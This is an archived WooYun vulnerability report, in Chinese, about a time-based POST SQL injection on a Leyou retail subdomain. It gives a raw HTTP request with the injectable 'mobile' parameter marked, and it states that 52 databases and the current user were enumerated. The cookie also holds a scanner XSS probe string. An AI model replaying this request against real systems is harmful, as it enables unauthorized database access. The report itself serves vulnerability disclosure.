乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-03: 细节已通知厂商并且等待厂商处理中 2015-11-08: 厂商已经主动忽略漏洞,细节向公众公开
乐友某站POST型SQL注入(延时注入)
1、乐友某站POST型SQL注入,POST包如下:
POST /wish_list/searcherror HTTP/1.1Content-Length: 141Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://image.leyou.com.cnCookie: LYB2cSess=c7823737789a8556000c7fd2b9d40f66; PHPSESSID=11905b6fb0d52efd03a21d5f8f796064; LYProdListPage=http%3A%2F%2Fwww.leyou.com%2Fproduct%2Fage_i%2F0%3FLY_Category%3D24%26LY_Order%3Dsale_price; LY_CODE_SESS=9b6fe4d3a5495602; LY_PC=907610d0fb0f7af0c1da65256b8e9fb0; __ozlvd1400=1445967796; returnUrl=; ykss=7d8a2f5690d2ad9522bb6c17; __ptmid=a6f4f176-1c14-473a-a80f-a60838cb59f0; bdshare_firstime=1445958530877; BAIDUID=65323EB3872A7160250D09A35ACDE496:FG=1; OZ_1U_1400=vid=v62f95263f303b.0&ctime=1445958949<ime=0; OZ_1Y_1400=erefer=http%3A//www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29&eurl=http%3A//image.leyou.com.cn/user/register.php&etime=1445958949&ctime=1445958949<ime=0&compid=1400; single_bombBox=%u6FB3%u95E8%u7279%u522B%u884C%u653F%u533A-%u79BB%u5C9B; bombBox_addrid=820000; OZ_0J_1400=DIV*AD_YD_carttj*1445959205&DIV*AD_YD_carttj*1445959206; OZ_0a_1400=AD_YD_carttj*1445959205*http%3A//image.leyou.com.cn/purchase/cart%3FimgUpdate1_x%3D1%26%23%23%232*http%3A//image.leyou.com.cn/purchase/cart%3FimgUpdate1_x%3D1%26%23%23%231&AD_YD_carttj*1445959206*http%3A//image.leyou.com.cn/purchase/cart%3FimgUpdate1_x%3D1%26%23%23%231*http%3A//image.leyou.com.cn/purchase/cart%3FimgUpdate1_x%3D1%26%231Host: image.leyou.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*button=GO&email=sample%40email.tst&email_name=%d4%da%b4%cb%ca%e4%c8%eb%c4%fa%b5%c4%c3%fb%d7%d6&mobile=*
2、mobile参数有问题:
3、52个库:
4、延时的,很慢,取下当前用户吧:
危害等级:无影响厂商忽略
忽略时间:2015-11-08 14:36
漏洞Rank:4 (WooYun评价)
2015-11-19:谢谢